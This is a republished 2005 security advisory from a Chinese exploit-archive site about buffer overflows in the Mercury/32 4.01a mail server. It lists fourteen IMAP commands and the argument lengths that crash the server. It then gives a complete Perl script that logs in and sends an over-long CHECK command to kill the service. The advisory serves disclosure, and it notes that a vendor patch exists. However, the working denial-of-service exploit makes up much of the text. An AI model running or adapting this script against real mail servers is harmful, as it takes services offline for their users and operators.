首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mercury Mail Multiple Buffer Overflows
来源:http://www.pmail.com/patches.htm 作者:Reed 发布时间:2005-09-14  

Mercury Mail Multiple Buffer Overflows

Summary
Mercury is "a free, standards-based mail server solution, providing comprehensive, fast server support for all major Internet e-mail protocols. It is supplied in two versions, one hosted on Windows systems, the other running as a set of NLMs on Novell NetWare file servers".

An authenticated user can trigger several buffer overflows and possibly run arbitrary code on the Mercury Mail server.

Credit:
The information has been provided by Reed Arvin.

Details
Vulnerable Systems:
* Mercury/32 version 4.01a

Immune Systems:
* Mercury/32 version 4.01b and later

There are 14 vulnerable commands that can be used to cause buffer overflows to occur. After a successful login to the mail server, if any of these commands are used with an overly long argument the application closes resulting in a denial of service.

The commands and approximate argument lengths are as follows:
EXAMINE A x 512 \r\n
SUBSCRIBE A x 512 \r\n
STATUS A x 512 \r\n
APPEND A x 512 \r\n
CHECK A x 512 \r\n
CLOSE A x 512 \r\n
EXPUNGE A x 512 \r\n
FETCH A x 512 \r\n
RENAME A x 768 \r\n
DELETE A x 768 \r\n
LIST A x 768 \r\n
SEARCH A x 768 \r\n
CREATE A x 1024 \r\n
UNSUBSCRIBE A x 1024 \r\n

Vendor Status:
The vendor was notified an patch was released to solve the issues. For more details visit the patches page at: http://www.pmail.com/patches.htm

Exploit Code:
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl <ip> <imap4 user> <imap4 pass>
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
###########################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";

sleep(1);

print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";

sleep(1);

print $socket "0001 CHECK " . "A" x 512 . "\r\n";

close($socket);

sleep(1);

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
close($socket);

print "failed!\n";
}
else
{
print "successful!\n";
}
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows XP Firewall Bypassing
·Zebedee DoS
·COOL! Remote Control DoS
·Counter Strike 2D DoS
·Snort <= 2.4.0 SACK TCP Opt
·VisualBoy Advanced Local Buffe
·Raxnet Cacti graph_image.php R
·BNBT EasyTracker DoS
·GNU Mailutils imap4d search Co
·CuteNews Code Execution
·USB Lock Auto-Protect Locally
·Mozilla Suite - Firefox - Nets
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved